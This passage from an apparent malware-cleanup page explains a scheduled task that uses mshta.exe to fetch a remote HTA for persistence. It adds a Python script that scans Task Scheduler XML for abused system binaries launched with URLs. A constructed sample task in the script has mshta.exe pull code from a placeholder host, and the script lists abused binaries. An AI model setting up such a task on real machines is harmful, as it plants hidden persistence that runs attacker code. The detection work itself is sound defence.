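The task FRST removed in the fixlog above is a textbook persistence pattern: a scheduled task named to look like a Windows component (SystemBoot) whose action is mshta.exe fetching an HTA from a remote URL, so the payload lives on the attacker's server rather than on disk. The following Python script is an added example, written for this page and not part of the original post, of FRST, or of any tool mentioned here. It parses Task Scheduler XML definitions (the files under C:\Windows\System32\Tasks, or an exported copy of that folder) and flags any Exec action that launches a script/proxy-execution binary with a URL in its arguments. The namespace is the real Task Scheduler 2.0 schema; the list of flagged binaries is the editor's choice and can be extended. The two task definitions embedded in the script are constructed samples modelled on the fixlog; the URL is a placeholder, because the real one is truncated in the log and is not reproduced here.

```python
"""Triage Windows Task Scheduler XML for LOLBin persistence such as
mshta.exe pulling a remote .hta (the pattern removed by the FRST fix above).

Added example for this page; not FRST's code. Works offline on the
constructed samples below, or on a folder of exported task XML files.
"""
import os
import re
import xml.etree.ElementTree as ET

# Task Scheduler 2.0 schema namespace used by files under C:\Windows\System32\Tasks.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts and proxy-execution binaries commonly abused from tasks (editor's list).
LOLBINS = {"mshta", "wscript", "cscript", "rundll32", "regsvr32", "powershell",
           "pwsh", "certutil", "bitsadmin", "msiexec", "cmd"}

URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")


def exec_basename(command):
    """Reduce a <Command> value to its lowercase base name without extension.

    '"C:\\Windows\\System32\\mshta.exe"' -> 'mshta'; '%windir%\\system32\\rundll32.exe' -> 'rundll32'.
    """
    name = command.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name.rsplit(".", 1)[0] if "." in name else name


def triage_task_xml(xml_text, task_name="<unknown>"):
    """Return a list of findings for one task definition.

    A finding is raised when an <Exec> action runs a known LOLBin and its
    <Arguments> carry a URL, i.e. the payload is fetched remotely at run time.
    A LOLBin with only local arguments (e.g. rundll32 shell32.dll,...) is not flagged.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for exec_node in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        command = exec_node.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        binary = exec_basename(command)
        urls = URL_RE.findall(args)
        if binary in LOLBINS and urls:
            findings.append({
                "task": task_name,
                "binary": binary,
                "urls": urls,
                "command_line": f"{command} {args}".strip(),
            })
    return findings


def scan_tasks_dir(tasks_dir):
    """Walk a Tasks folder (live or exported) and triage every XML file in it.

    Task files are normally UTF-16 with a BOM; anything that is not parseable
    XML is skipped rather than aborting the scan.
    """
    results = []
    for dirpath, _, files in os.walk(tasks_dir):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
                if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
                    text = data.decode("utf-16")
                else:
                    text = data.decode("utf-8", "replace")
                results.extend(triage_task_xml(text, task_name=os.path.relpath(path, tasks_dir)))
            except (OSError, ET.ParseError):
                continue
    return results


# Constructed sample modelled on the SystemBoot task in the FRST fixlog above.
# The URL is a placeholder, not the real one (which is truncated in the log).
SAMPLE_MALICIOUS_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>mshta.exe</Command>
      <Arguments>http://persistence.example.invalid/reg2.php?id=PLACEHOLDER</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign sample: a LOLBin with purely local arguments must not be flagged.
SAMPLE_BENIGN_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\\system32\\rundll32.exe</Command>
      <Arguments>shell32.dll,Control_RunDLL</Arguments>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for name, xml_text in (("SystemBoot", SAMPLE_MALICIOUS_TASK), ("LocalControlPanel", SAMPLE_BENIGN_TASK)):
        for finding in triage_task_xml(xml_text, name):
            print(f"[!] {finding['task']}: {finding['binary']} -> {', '.join(finding['urls'])}")
```

Run it against a copy of the Tasks folder with scan_tasks_dir(r"C:\Windows\System32\Tasks") (or a folder pulled from a disk image); each hit gives the task path, the abused binary and the URLs to block at the proxy or DNS layer. The URL condition is what separates the SystemBoot case from legitimate tasks that also use rundll32 or powershell with local arguments, so keep it rather than alerting on the binary name alone.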